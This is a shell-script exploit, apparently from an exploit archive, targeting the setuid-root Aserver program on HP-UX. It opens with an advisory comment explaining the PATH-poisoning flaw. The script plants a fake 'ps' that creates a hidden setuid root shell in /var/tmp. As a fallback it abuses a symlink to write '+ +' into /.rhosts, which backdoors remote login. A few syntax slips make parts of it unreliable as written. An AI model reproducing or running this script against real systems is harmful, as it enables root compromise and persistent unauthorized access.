33 lines
No EOL
1.2 KiB
Bash
Executable file
33 lines
No EOL
1.2 KiB
Bash
Executable file
# source: https://www.securityfocus.com/bid/1929/info
|
|
#
|
|
# Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default.
|
|
#
|
|
# During normal execution, Aserver executes "ps" via the system() libcall, relying on the PATH environment variable to do so. As a result, a user can modify their PATH environment variable so that it includes an arbitrary program called 'ps' before executing Aserver. When Aserver is run with the -f argument, the offending system() function will be called and the attacker's version of ps will be executed as root.
|
|
#
|
|
# This is a trivial root compromise.
|
|
#
|
|
|
|
#!/bin/sh
|
|
#
|
|
# HP-UX aserver.sh - Loneguard 18/10/98
|
|
# Simple no brainer path poison followed by a twist [ inspired by DC ;) ]
|
|
#
|
|
cd /var/tmp
|
|
cat < _EOF > ps
|
|
#!/bin/sh
|
|
cp /bin/csh /var/tmp/.foosh
|
|
chmod 4755 /var/tmp/.foosh
|
|
_EOF
|
|
chmod 755 ps
|
|
PATH=.:$PATH
|
|
/opt/audio/bin/Aserver -f
|
|
if [ -e /var/tmp/.foosh ]
|
|
# Hmmm, you not like that technique?
|
|
cd /tmp
|
|
rm last_uuid
|
|
ln -s /.rhosts last_uuid
|
|
/opt/audio/bin/Aserver -f
|
|
echo "+ +" > /.rhosts
|
|
# Haha, my Kungfu is the best!
|
|
fi
|
|
echo Crazy MONKEY! |